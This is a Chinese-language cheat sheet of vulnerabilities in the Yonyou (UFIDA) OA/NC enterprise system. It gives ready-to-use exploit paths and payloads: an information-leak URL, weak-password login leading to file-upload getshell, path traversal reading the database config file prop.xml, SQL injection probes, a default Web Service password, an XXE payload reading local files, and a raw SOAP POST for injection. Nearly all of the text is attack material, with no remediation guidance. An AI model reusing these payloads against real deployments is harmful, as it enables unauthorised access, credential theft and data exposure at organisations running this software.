用友UFIDAOA系统漏洞集合

信息泄露+弱口令+任意文件上传Getshell

1、信息泄露

/service/~iufo/com.ufida.web.action.ActionServlet? action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=

NU1

2、弱口令和任意文件上传

登录进去后再访问信息泄露的地址,就有权限上传文件了。然后返回主页直接查看发表的内容就行了。

二、任意文件读取

/NCFindWeb?service=IPreAlertConfigService&filename=
/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml  #数据库配置文件

三、SQLi

/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute

'or 1=1-- 和'or 1=2-- 返回的结果是不一样的

四、Web Service

1、Web Service默认后台自动登录+XXE

后台:/uapws/ 
自动登录,默认密码:111111(6)

2、XXE

**提示**:此处关闭了Web Service后台也能访问,访问结果是空白,但不影响XXE的任意文件读取。
    /uapws/soapFormat.ajax

    POST包:
    msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///c:/windows/"> ]>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <soap:Fault>
    <faultcode>soap:Server%26xxe1two%3b</faultcode>
    </soap:Fault>
    </soap:Body>
    </soap:Envelope>%0a

3、Web Service SQLi

/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl  
/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl

POST包:
POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1
Host: **xxx.xxx.com**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 646

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"                     xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:exportCurrtypeToCrm>           <string>1</string>        </urn:exportCurrtypeToCrm>     </SOAP-ENV:Body></SOAP-ENV:Envelope>